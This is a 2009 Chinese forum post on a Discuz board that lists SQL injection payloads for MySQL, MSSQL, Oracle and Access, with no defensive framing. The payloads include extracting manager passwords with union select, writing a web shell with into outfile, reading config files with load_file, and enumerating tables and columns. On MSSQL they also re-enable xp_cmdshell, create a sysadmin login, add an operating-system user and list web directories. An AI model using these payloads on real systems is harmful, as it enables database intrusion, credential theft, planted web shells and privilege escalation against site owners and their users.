找回密码
 入学

QQ登录

只需一步,快速开始

查看: 1400|回复: 0

各种数据库注入常识

[复制链接]
发表于 2009-4-20 20:21:03 | 显示全部楼层 |阅读模式
  1. MySQL注入常用语句/函数-------------
  2. /*!30000 s
  3. union select 1,2,3,4,password,6 from manager
  4. into outfile '/home/web1/shell.php'
  5. instr(substring(load_file('/home/web1/config.php'),'password'))>0
  6. ord(substring(load_file('/home/web1/config.php'),1,1))>112
  7. ord(substring(load_file(0x2F686F6D652F776562312F636F6E6669672E706870),1,1))>112

  8. MSSQL注入常用语句/函数-------------
  9. select count(*) FROM master..sysobjects where xtype = 'X' AND name = 'xp_cmdshell'
  10. And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 //依次得到表名
  11. And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(78)+NCHAR(101)+NCHAR(119)+NCHAR(115)+NCHAR(95)+NCHAR(85)+NCHAR(115)+NCHAR(101)+NCHAR(114)) Order by colid) T Order by colid desc)>0 //得到列名
  12. And (Select Cast(Count(1) as varchar(8000))+char(97) From [TableName] Where 1=1)>0 //得到字段的记录个数
  13. And (Select Top 1 isNull(cast([sName] as varchar(8000)),char(32))+char(124) From (Select Top 1 sName From [TableName] Where 1=1 Order by sName) T Order by sName desc)>0 //得到字段的值
  14. select IS_SRVROLEMEMBER('sysadmin')
  15. select user_name()
  16. EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
  17. exec master.dbo.sp_addlogin test,test
  18. exec master.dbo.sp_addsrvrolemember test,sysadmin
  19. exec master.dbo.sp_password test,123456,test
  20. exec master.dbo.xp_cmdshell 'net user IWAM-IUSR /add'
  21. insert into temp(s1) exec master.dbo.xp_cmdshell 'dir d:\web\*.asp /s/a'
  22. insert into temp(s1) exec master.dbo.xp_subdirs 'd:\'
  23. insert into temp(s1,s2) exec master.dbo.xp_dirtree 'd:\'
  24. sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
  25. ascii('a')=97

  26. Oracle注入常用语句/函数------------
  27. 0<>(select count(*) from all_tables) and 1=1
  28. 0<>(select count(*) from user_tables) and 1=1
  29. 0<>(select count(*) from user_tab_columns) and 1=1
  30. 0<>(select count(*) from user_tab_columns where column_name like chr(37)||chr(80)||chr(65)||chr(83)||chr(83)||chr(37)) and 1=1
  31. chr(97)||chr(98) ascii length substr

  32. Acess注入常用语句/函数-------------
  33. exists(select * from admin where asc(mid(username,1,1))>97)
复制代码
您需要登录后才可以回帖 登录 | 入学

本版积分规则

QQ|Archiver|手机版|小黑屋|校园天空成立于2004年2月24日 ( 陕ICP备08000078号-8 )

GMT+8, 2025-6-26 07:27 , Processed in 0.071128 second(s), 17 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表